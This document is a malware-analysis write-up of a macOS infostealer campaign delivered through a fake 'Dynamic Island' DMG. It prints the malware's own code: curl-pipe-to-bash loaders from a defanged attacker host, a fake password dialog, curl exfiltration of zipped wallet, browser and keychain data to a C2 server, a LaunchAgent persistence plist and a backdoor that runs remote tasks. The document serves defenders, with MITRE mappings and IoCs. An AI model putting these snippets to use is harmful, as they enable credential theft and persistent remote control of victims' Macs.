> For the complete documentation index, see [llms.txt](https://pujo.gitbook.io/en/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pujo.gitbook.io/en/malware-analysis/macos-fake-dynamic-island.md).

# MacOS Fake Dynamic Island

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FELzD6FIYnVDzDSYURund%2Fimage.png?alt=media&#x26;token=694aaea3-078e-44c5-814b-65a7ce6a46f2" alt=""><figcaption></figcaption></figure>

I recently found a malicious YouTube ad while trying to search for an interesting video during my lunch break. Then I found some highly sophisticated macOS malware campaign distributed via malicious DMG files.

## Initial Infection Vector

**Delivery Method**

The malware is delivered as a `.dmg` file distributed through the link in the youtube description, `dynamichub[.]app` .

**Initial Execution**

When we opens the DMG and runs the installer, the first-stage loader executes:

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FeadZa46a17pMHhQ6WQIY%2Fimage.png?alt=media&#x26;token=09019d1b-5022-4a53-9a94-822e1e04056c" alt=""><figcaption></figcaption></figure>

```bash
nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8.pages[.]dev/yKfbGmNuw10mYJP0Tm8NuP95R1l5KTpNTuJylr70QQLYur10ePs9ZwLEqQrXrAS8ZU2[.]aspx | bash
```

This simple command initiates a complex multi-stage attack chain.

### **Attack Flow**

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FGZd7fx3VHvRv6JSDcBSV%2Fimage.png?alt=media&#x26;token=13f285ff-e7f7-44cf-937f-1f0f45a2fbc5" alt=""><figcaption></figcaption></figure>

## Stages

### Stage 1: Initial Loader Script

File: `yKfbGmNuw10mYJP0Tm8NuP95R1l5KTpNTuJylr70QQLYur10ePs9ZwLEqQrXrAS8ZU2.aspx`

**Key Function:**

1. Executing Throttling:

```bash
STAMP="/tmp/exec_throttle.lock"
if [[ -f "$STAMP" ]] && (( $(date +%s) - $(cat "$STAMP") < 900 )); then
    exit 0
fi
date +%s > "$STAMP"
```

It prevents re-executions within 15 minutes and uses an anti-analysis technique to limit sandbox detonations and reduce detection by preventing rapid, repeated executions. Therefore, the action will take longer, but it will be silent.

2. Machine/Victim Identification

```bash
WID=$(uuidgen | md5)
```

It generates a unique work ID for tracking this specific infection. It allows attackers to correlate data from multiple payloads and is used throughout the infection chain for victim tracking.

3. Parallel Payload Deployment

```bash
nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/MllawBCKM5JtFbYfGhSrHr8g7ubPT2yBaCgOPtxKA5bwePZ9WhZMCViuEG4J3xqTaKil[.]aspx | bash -s "$WID" > /dev/null 2>&1 &
nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/d50hjd3zlshdWpwHAGatYYWHUsTzmG5onTKAw16KK5NTbl1jvggVFgrUwXBMKRm2FdBiFpys39[.]aspx | osascript -l JavaScript - "wid:$WID" > /dev/null 2>&1 &
nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/jKY8I8tI9kkB7gurNIqpVbs7TqddHmXN7fTgD5lyP4eYKh372WMKeQtQtehpBRzrAfOGUak[.]aspx | bash > /dev/null 2>&1 &
```

Three payloads run at the same time in the background. Everything is sent to /dev/null to hide it, and nohup makes sure it keeps going even after the main process is done.

### Stage 2A: Credentials Theft Chain

1. **Phising Dialog**

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FEZF74FYSuMf1ZoV4gfwa%2Fimage.png?alt=media&#x26;token=1ff59d83-0f85-45ed-9381-b044ac9fce0a" alt=""><figcaption></figcaption></figure>

File: `zJgrwl7UBf8kbWkfdeiWUSb7QAfI7KoDXO3c8d23Iv4J0sosBPFJHR1sgfBUr5V84IQlGt1wO5zwe.aspx` (Javascript for Automation)

The attack technique is creates a convincing fake authentication dialog using macOS native APIs:

```javascript
app.displayDialog("Please enter your password to continue:", {
    defaultAnswer: '',
    hiddenAnswer: true,
    buttons: ['Cancel', 'OK'],
    defaultButton: 'OK',
    withIcon: 'note'
})
```

It works because use legitimate macOS `displayDialog` API. Hide the password prompted use dots, and the user conditioned to enter the password when prompted.

Then it will loop use credential validations:

```javascript
// Test password against real system authentication
app.doShellScript('/usr/bin/dscl /Local/Default -authonly "' + username + '" "' + password + '"')
```

It will validate the inputted password, if its **correct**, then it will stores as valid and exits. And if its **incorrect**, it will stores in invalid array, and shows error: `"Incorrect password. Please try again:"` . All the attempt is collected then it will send with this format:

```json
{
  "user": "victimUsername",
  "valid": "correct_password_here",
  "invalid": ["wrong_attempt1", "wrong_attempt2", "wrong_attempt3"]
}
```

2. **Credential Exfiltration**

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FTCBF4H9JDCodvMFbYYeG%2Fimage.png?alt=media&#x26;token=70b95413-580a-4081-b055-c0a238331b59" alt=""><figcaption></figcaption></figure>

File: `nbnusGNdcwdxTqpbKfR5HbMugXy970s92wbaJOmIL6X7hNNyVv5SEIMoaxFvoe4t6FVl2fdmg.aspx`

Exfiltration Endpoint: `https://fixyourallergywithus[.]com/api/credentials`

It has advanced anti-analysis features:

* Proof of Work (PoW)

```javascript
function solveProofOfWork(challenge, complexity) {
    const prefix = '0'.repeat(complexity);  // e.g., "0000"
    let nonce = 0;
    while (true) {
        const hash = computeSHA256(nonce + '-' + challenge);
        if (hash.startsWith(prefix)) return nonce;
        nonce++;
    }
}
```

The server sends the client a *challenge* string and a *difficulty level* (number of leading zeros). The client must brute-force a nonce such that:

```
SHA256(nonce + "-" + challenge) starts with N zeros
```

This is the same idea as Bitcoin mining, just scaled down. For a human or a single infected host, this cost is acceptable. For sandboxes, emulators, or large-scale automated crawlers, it’s painful. Every analysis run now burns CPU time, which dramatically slows bulk malware triage and forces analysts to either patch the logic or wait.

* Exponential backoff with jitter

```js
const baseDelay = 60;
const exponentialDelay = baseDelay * Math.pow(2, attemptCount);
const jitter = Math.random() * exponentialDelay;
const finalDelay = baseDelay + jitter;
```

Once the client successfully completes the proof-of-work, the server issues a token. That token is then used for subsequent requests so the expensive challenge doesn’t need to be repeated every time. This keeps normal operation efficient while still preventing replay attacks, unauthorized submissions, or analysts trying to fake valid traffic without completing the full protocol.

Put together, this forms a stateful, adaptive handshake that is cheap for real clients but costly and inconvenient for analysts.

### Stage 2B: Data Stealer

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FLGYPAwwb3DaaJDv859li%2Fimage.png?alt=media&#x26;token=0f081c67-e251-4555-a786-7b51feec1c06" alt=""><figcaption></figcaption></figure>

File: `d50hjd3zlshdWpwHAGatYYWHUsTzmG5onTKAw16KK5NTbl1jvggVFgrUwXBMKRm2FdBiFpys39.aspx`\
Exfiltration Endpoint: `https://fixyourallergywithus[.]com/api/log`

This is the primary data theft module with comprehensive targeting.

<details>

<summary><strong>Cryptocurrency Wallet</strong></summary>

It steals 17++ wallet applications hardcoded in the malware:

<table><thead><tr><th>Wallet Type</th><th width="315.97265625">Target Path</th><th>Data Stolen</th></tr></thead><tbody><tr><td><strong>Electrum</strong></td><td><code>~/.electrum/wallets</code></td><td>Bitcoin wallet files</td></tr><tr><td><strong>Electrum-LTC</strong></td><td><code>~/.electrum-ltc/wallets</code></td><td>Litecoin wallets</td></tr><tr><td><strong>Electron Cash</strong></td><td><code>~/.electron-cash/wallets</code></td><td>Bitcoin Cash wallets</td></tr><tr><td><strong>Exodus</strong></td><td><code>~/Library/Application Support/Exodus</code></td><td>Multi-currency wallet</td></tr><tr><td><strong>Ledger Live</strong></td><td><code>~/Library/Application Support/Ledger Live</code></td><td>Hardware wallet interface</td></tr><tr><td><strong>Trezor Suite</strong></td><td><code>~/Library/Application Support/@trezor/suite-desktop</code></td><td>Hardware wallet config</td></tr><tr><td><strong>Atomic Wallet</strong></td><td><code>~/Library/Application Support/atomic/Local Storage/leveldb</code></td><td>Multi-currency wallet</td></tr><tr><td><strong>Coinomi</strong></td><td><code>~/Library/Application Support/Coinomi/wallets</code></td><td>Multi-currency mobile wallet</td></tr><tr><td><strong>Guarda</strong></td><td><code>~/Library/Application Support/Guarda</code></td><td>Multi-currency wallet</td></tr><tr><td><strong>Binance</strong></td><td><code>~/Library/Application Support/Binance/app-store.json</code></td><td>Exchange wallet config</td></tr><tr><td><strong>Wasabi Wallet</strong></td><td><code>~/.walletwasabi/client/Wallets</code></td><td>Privacy-focused Bitcoin</td></tr><tr><td><strong>Bitcoin Core</strong></td><td><code>~/Library/Application Support/Bitcoin/wallets</code></td><td>Bitcoin wallet.dat files</td></tr><tr><td><strong>Dogecoin Core</strong></td><td><code>~/Library/Application Support/Dogecoin/wallets</code></td><td>Dogecoin wallets</td></tr><tr><td><strong>Litecoin Core</strong></td><td><code>~/Library/Application Support/Litecoin/wallets</code></td><td>Litecoin wallets</td></tr><tr><td><strong>DashCore</strong></td><td><code>~/Library/Application Support/DashCore/wallets</code></td><td>Dash cryptocurrency</td></tr><tr><td><strong>Monero</strong></td><td><code>~/Monero/wallets</code></td><td>Privacy coin wallets</td></tr><tr><td><strong>Tonkeeper</strong></td><td><code>~/Library/Application Support/@tonkeeper/desktop/config.json</code></td><td>TON blockchain wallet</td></tr></tbody></table>

</details>

<details>

<summary><strong>Browser Data Exfiltration</strong></summary>

It targets both Chromium-based like Chrome, Brave, Edge, Opera, Vivaldi, and Firefox browsers. Extracting:

**Chromium Browsers** (Chrome, Brave, Edge, Opera, Vivaldi):

* `Login Data` - Saved passwords
* `Cookies` - Session tokens, authentication cookies
* `History` - Browsing history
* `Web Data` - Autofill data (addresses, credit cards)
* `Bookmarks` - Saved bookmarks
* `Local Extension Settings` - Browser extension data (including MetaMask, Phantom, etc.)

**Firefox Browsers**:

* `logins.json` - Saved passwords
* `key4.db` - Encryption key for password database
* `cookies.sqlite` - Cookie database
* `places.sqlite` - Bookmarks and history
* `formhistory.sqlite` - Form autofill data
* `prefs.js` - Browser preferences
* `extensions.json` - Installed extensions list
* `moz-extension+++*` directories - Extension local storage

</details>

<details>

<summary><strong>MacOS Keychain Theft</strong></summary>

**Target**: `~/Library/Keychains/login.keychain-db`

It extract all saved password from Safari and macOS. Like wifi password, Email account password, Application password, etc.

</details>

**Collection Process**

1. Temporary Directory Creation:

```bash
mkdir -p /tmp/[random_md5]
```

2. Recursive File Copying:

```js
safeCopyItem(fileManager, sourcePath, destinationPath)
```

* Uses macOS NSFileManager APIs
* Preserves directory structure
* Handles permission errors gracefully

3. Archive Creation:

```bash
cd /tmp && zip -r -q -y '[random].zip' '[target_dir]'
```

* Creates compressed ZIP archive
* Quiet mode (no output)
* Preserves symlinks (`-y` flag)

4. Exfiltration:

```bash
curl -s -N --fail-early -X POST \
  -A "[hardware_uuid_md5]/1.0" \
  -F 'file=@[archive].zip' \
  -F 'metadata={"wid":"[victim_id]"}' \
  'https://fixyourallergywithus[.]com/api/log?t=[token]'
```

5. Evidence Destruction:

```bash
rm -rf "/tmp/[archive].zip"
rm -rf "/tmp/[temp_dir]"
```

### Stage 2C: Document and Notes Stealer

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FHDhb1xGGw3QcB0TqMrg9%2Fimage.png?alt=media&#x26;token=8a7b3d5a-7e86-4485-b406-edeae1327491" alt=""><figcaption></figcaption></figure>

File: `JtSrMgngIzUyMyBbvAOE5izvGIbbkgxCGsJw8ptyXzGqh3Y6kF7n3feSJfoDTFF1ziMU0dX.aspx`\
Exfiltration Endpoint: `https://fixyourallergywithus[.]com/api/grabber`

**Extracting Apple Notes**

```js
const notesApp = Application('Notes');
const folders = notesApp.folders().filter(folder => folder.notes().length > 0);

folders.forEach((folder, folderIndex) => {
    folder.notes().forEach((note, noteIndex) => {
        const content = note.name() + '\n\n' + note.plaintext();
        // Save to file
    });
});
```

**File System Document Harvesting**

It targeted at `~/Documents`, `~/Downloads`, and `~/Desktop` with filtering it for file under 100KB only. I assume that because file below that size typically include:

* `.txt` files with passwords/seeds
* `.key` private key files
* `.pem` certificates
* `.json` configuration files with API keys
* `.env` environment variable files
* Small PDFs with seed phrases
* Code snippets with credentials
* SSH private keys
* GPG keys
* Wallet backup files

**Permission Bypass Attempt**

The malware attempts to run:

```bash
tccutil reset All
```

This command wipes **all** TCC permissions on the system, including Full Disk Access, Files and Folders access, screen recording, microphone, and camera permissions. If it were to succeed, macOS would forget which apps were previously restricted, potentially allowing the malware to re-request access or operate before protections are re-established.

### Stage 2D: Pesistence

<figure><img src="https://4096660860-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4c40uM9vhXtGvaktvXiu%2Fuploads%2FjUbpZF6aOf5fS3NQ4FIB%2Fimage.png?alt=media&#x26;token=94aa0a87-d3e1-4ddd-a5c5-7d99cb67ec13" alt=""><figcaption></figcaption></figure>

File: `jKY8I8tI9kkB7gurNIqpVbs7TqddHmXN7fTgD5lyP4eYKh372WMKeQtQtehpBRzrAfOGUak.aspx`\
Downloaded Backdoor: `NRtjmyszAQorbqwFH4MD7EcZAT0fUOjDMv2GKh6QEytpN4xxNEYGPeTyUnXcIdRIzUjGyuArvBNadbE.aspx`

**Process**

1. Hardware-based Naming

```bash
MD5HWID=$(system_profiler SPHardwareDataType | grep 'Hardware UUID' | awk '{print $NF}' | md5)
```

The malware fingerprints the machine by extracting the macOS **Hardware UUID** and hashing it with MD5. This produces a deterministic but opaque identifier unique to that device. That hash is reused everywhere: directory name, script filename, LaunchAgent label. This makes the infection **host-specific**, avoids hardcoded filenames, and breaks simple IOC-based detection since no two victims look the same on disk.

2. Hidden Directory Creation

```bash
APP_DIR="$HOME/Library/Application Support/${MD5HWID}"
mkdir -p "$APP_DIR"
```

Combined with the hash-based name, the directory blends in as something that *looks like* an internal app identifier rather than malware. Nothing stands out unless you already know what to look for.

3. Backdoor Download

```bash
JS_URL="https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/NRtjmyszAQorbqwFH4MD7EcZAT0fUOjDMv2GKh6QEytpN4xxNEYGPeTyUnXcIdRIzUjGyuArvBNadbE[.]aspx"
JS_PATH="${APP_DIR}/${MD5HWID}.js"
curl -fsSL "$JS_URL" -o "$JS_PATH"
chmod +x "$JS_PATH"
```

It’s marked executable and staged quietly, with no user interaction. At this point, the system is already compromised, but persistence hasn’t kicked in yet.

4. LaunchAgent Persistence

```bash
PLIST_PATH="$HOME/Library/LaunchAgents/${MD5HWID}.plist"
```

Creates LaunchAgent with the following configuration:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>[MD5HWID]</string>
    
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/osascript</string>
        <string>-l</string>
        <string>JavaScript</string>
        <string>~/Library/Application Support/[MD5HWID]/[MD5HWID].js</string>
    </array>
    
    <key>RunAtLoad</key>
    <true/>
    
    <key>KeepAlive</key>
    <true/>
    
    <key>ThrottleInterval</key>
    <integer>60</integer>
    
    <key>StandardOutPath</key>
    <string>/dev/null</string>
    
    <key>StandardErrorPath</key>
    <string>/dev/null</string>
</dict>
</plist>
```

Persistence is achieved via a per-user LaunchAgent, not a system daemon, meaning no root access is required. The plist is again named with the HWID hash and configured to execute the backdoor using `osascript` with JavaScript (JXA). `RunAtLoad` ensures execution at login, `KeepAlive` respawns the process if killed, and `ThrottleInterval` prevents excessive restart loops that might draw attention. All stdout and stderr are redirected to `/dev/null`, eliminating local execution artifacts.

5. LaunchAgent Activation

```bash
launchctl load "$PLIST_PATH"
launchctl start "$PLIST_NAME"
```

**Backdoor Functionality**

1. C2 Polling Loop

```js
// Poll every 60 seconds
const config = {
    'domain': 'https://fixyourallergywithus.com',
    'endpoint': '/api/poll',
    'pollInterval': 60
};

function pollServer(url) {
    while (true) {
        const response = sendRequest(url, 'POST', '{}', token);
        const parsed = parseResponse(response);
        
        if (parsed && parsed.task) {
            executeTask(parsed.task);
            confirmTask(url, parsed.task.id);
        }
        
        sleep(60);  // Wait 60 seconds before next poll
    }
}
```

2. Remote Code Execution

The backdoor supports three execution types:

* Bash Script

```js
if (taskType === 'bash') {
    command = 'nohup curl -s "' + taskUrl + '" | bash > /dev/null 2>&1 &';
}
```

* Apple Script

```js
if (taskType === 'applescript') {
    command = 'nohup curl -s "' + taskUrl + '" | osascript - > /dev/null 2>&1 &';
}
```

* Javascript for Automation (JXA)

```js
if (taskType === 'javascript') {
    command = 'nohup curl -s "' + taskUrl + '" | osascript -l JavaScript - > /dev/null 2>&1 &';
}
```

**Task Execution Flow**

1. Backdoor polls C2 server
2. Server responds with task: `{"url": "[payload_url]", "type": "bash", "id": 12345}`
3. Backdoor downloads payload from URL
4. Executes payload with appropriate interpreter
5. Confirms successful execution to C2
6. Continues polling for next task

## **MITRE ATT\&CK Mapping** <a href="#undefined" id="undefined"></a>

Some MITRE ATT\&CK techniques associated with this malware include:

<table><thead><tr><th width="226">ID</th><th>Technique</th><th>Implementation</th></tr></thead><tbody><tr><td><strong>T1566.001</strong></td><td>Phishing: Spearphishing Attachment</td><td>Malicious DMG file distribution</td></tr><tr><td><strong>T1204.002</strong></td><td>User Execution: Malicious File</td><td>Victim opens DMG and runs installer</td></tr><tr><td><strong>T1059.004</strong></td><td>Command and Scripting: Unix Shell</td><td>Bash scripts for initial execution</td></tr><tr><td><strong>T1059.002</strong></td><td>Command and Scripting: AppleScript</td><td>osascript for payload execution</td></tr><tr><td><strong>T1140</strong></td><td>Deobfuscate/Decode Files</td><td>JavaScript obfuscation with runtime deobfuscation</td></tr><tr><td><strong>T1082</strong></td><td>System Information Discovery</td><td>Hardware UUID fingerprinting</td></tr><tr><td><strong>T1033</strong></td><td>System Owner/User Discovery</td><td><code>whoami</code> command execution</td></tr><tr><td><strong>T1124</strong></td><td>System Time Discovery</td><td>Timestamp generation for execution throttle</td></tr><tr><td><strong>T1005</strong></td><td>Data from Local System</td><td>Cryptocurrency wallets, browser data</td></tr><tr><td><strong>T1555.001</strong></td><td>Credentials from Password Stores: Keychain</td><td>macOS Keychain theft</td></tr><tr><td><strong>T1555.003</strong></td><td>Credentials from Password Stores: Credentials from Web Browsers</td><td>Browser password databases</td></tr><tr><td><strong>T1539</strong></td><td>Steal Web Session Cookies</td><td>Browser cookie theft</td></tr><tr><td><strong>T1056.002</strong></td><td>Input Capture: GUI Input Capture</td><td>Fake authentication dialog</td></tr><tr><td><strong>T1552.001</strong></td><td>Unsecured Credentials: Credentials In Files</td><td>Searching for seed phrases in documents</td></tr><tr><td><strong>T1119</strong></td><td>Automated Collection</td><td>Scripted collection of wallets/browsers</td></tr><tr><td><strong>T1560.001</strong></td><td>Archive Collected Data: Archive via Utility</td><td>ZIP compression of stolen data</td></tr><tr><td><strong>T1041</strong></td><td>Exfiltration Over C2 Channel</td><td>HTTPS POST to C2 server</td></tr><tr><td><strong>T1071.001</strong></td><td>Application Layer Protocol: Web Protocols</td><td>HTTPS for C2 communication</td></tr><tr><td><strong>T1573.002</strong></td><td>Encrypted Channel: Asymmetric Cryptography</td><td>HTTPS encryption</td></tr><tr><td><strong>T1543.001</strong></td><td>Create or Modify System Process: Launch Agent</td><td>LaunchAgent persistence</td></tr><tr><td><strong>T1547.011</strong></td><td>Boot or Logon Autostart: Plist Modification</td><td>LaunchAgent plist creation</td></tr><tr><td><strong>T1070.004</strong></td><td>Indicator Removal: File Deletion</td><td>Deletes temp files after exfiltration</td></tr><tr><td><strong>T1070.006</strong></td><td>Indicator Removal: Timestomp</td><td>Potential timestamp manipulation</td></tr><tr><td><strong>T1027.002</strong></td><td>Obfuscated Files or Information: Software Packing</td><td>JavaScript obfuscation</td></tr><tr><td><strong>T1497.001</strong></td><td>Virtualization/Sandbox Evasion: System Checks</td><td>Proof-of-work anti-sandbox</td></tr><tr><td><strong>T1497.003</strong></td><td>Virtualization/Sandbox Evasion: Time Based Evasion</td><td>Execution throttling + exponential backoff</td></tr><tr><td><strong>T1102</strong></td><td>Web Service: Legitimate Service for C2</td><td>Cloudflare Pages abuse</td></tr><tr><td><strong>T1219</strong></td><td>Remote Access Software</td><td>Persistent backdoor for remote control</td></tr><tr><td><strong>T1105</strong></td><td>Ingress Tool Transfer</td><td>Downloads additional payloads via curl</td></tr></tbody></table>

## **Conclusion** <a href="#undefined" id="undefined"></a>

This macOS infostealer represents a significant evolution in macOS malware sophistication. Key takeaways:

#### **Technical Highlights**

1. **Multi-stage architecture** enables modular, flexible operations
2. **Native API abuse** makes detection extremely difficult
3. **Comprehensive data theft** targets 17+ cryptocurrency wallets, browsers, and system credentials
4. **Persistent backdoor** provides long-term access with full RCE capabilities
5. **Advanced evasion** including proof-of-work, throttling, and obfuscation

## **Indicators of Compromise (IoCs)** <a href="#undefined" id="undefined"></a>

### **Network Indicators**

**Domains**:

```
518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev
fixyourallergywithus[.]com
```

**URL Patterns**:

```
https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/*.aspx
https://fixyourallergywithus[.]com/api/credentials
https://fixyourallergywithus[.]com/api/log
https://fixyourallergywithus[.]com/api/grabber
https://fixyourallergywithus[.]com/api/poll
```

### **File System Indicators**

**Malware Artifacts**:

```
/tmp/exec_throttle.lock
~/Library/Application Support/[32-char-hex]/[32-char-hex].js
~/Library/LaunchAgents/[32-char-hex].plist
```

**Hash Files:**

```
2f2c83403a5fc47c10ecf827d10a260e791d2cdd32a2964912597256c9bc6f2a  DynamicHub.dmg
a841f1738c207d328d170d8cab07263ab62c715d1e513428c1ede248ea494f49  Drag into Terminal.xyz
eb80e878c13619f01190db7e5f6094ab4e366b044afd837439bb1d752a9b38d2  yKfbGmNuw10mYJP0Tm8NuP95R1l5KTpNTuJylr70QQLYur10ePs9ZwLEqQrXrAS8ZU2.aspx
a85c18dc94c4f29ac5ed6c7046c4d5028d0f2f3880d028ddc31427e93c2fe165  NRtjmyszAQorbqwFH4MD7EcZAT0fUOjDMv2GKh6QEytpN4xxNEYGPeTyUnXcIdRIzUjGyuArvBNadbE.aspx
0c72dce7dcc068b47fad0b98d419a9b63bf97ebcc6bdbdcd82e8fd9187bbd802  nbnusGNdcwdxTqpbKfR5HbMugXy970s92wbaJOmIL6X7hNNyVv5SEIMoaxFvoe4t6FVl2fdmg.aspx
ea2f15bbb2607566c1af6bc5566a6074aa457d3496503ef969fa96f9bd687cb8  zJgrwl7UBf8kbWkfdeiWUSb7QAfI7KoDXO3c8d23Iv4J0sosBPFJHR1sgfBUr5V84IQlGt1wO5zwe.aspx
c6ac11d417af9787d7e20b8a6f8e9707aa0a9d01328e83c7b573fbd4ef6032c0  JtSrMgngIzUyMyBbvAOE5izvGIbbkgxCGsJw8ptyXzGqh3Y6kF7n3feSJfoDTFF1ziMU0dX.aspx
78f95133c00b0b4f005f662be26a504d69b215c00cbcd7d3b4055a78e4d19934  jKY8I8tI9kkB7gurNIqpVbs7TqddHmXN7fTgD5lyP4eYKh372WMKeQtQtehpBRzrAfOGUak.aspx
396d1a9e51b17659248b78a6fac49ec92eb86cd6b081c3a74a3f929348d491b1  d50hjd3zlshdWpwHAGatYYWHUsTzmG5onTKAw16KK5NTbl1jvggVFgrUwXBMKRm2FdBiFpys39.aspx
d251def5e1df0d52f6573d82c27c001d9d4a47ee94c201fa1efb66f9ab32322c  MllawBCKM5JtFbYfGhSrHr8g7ubPT2yBaCgOPtxKA5bwePZ9WhZMCViuEG4J3xqTaKil.aspx
```
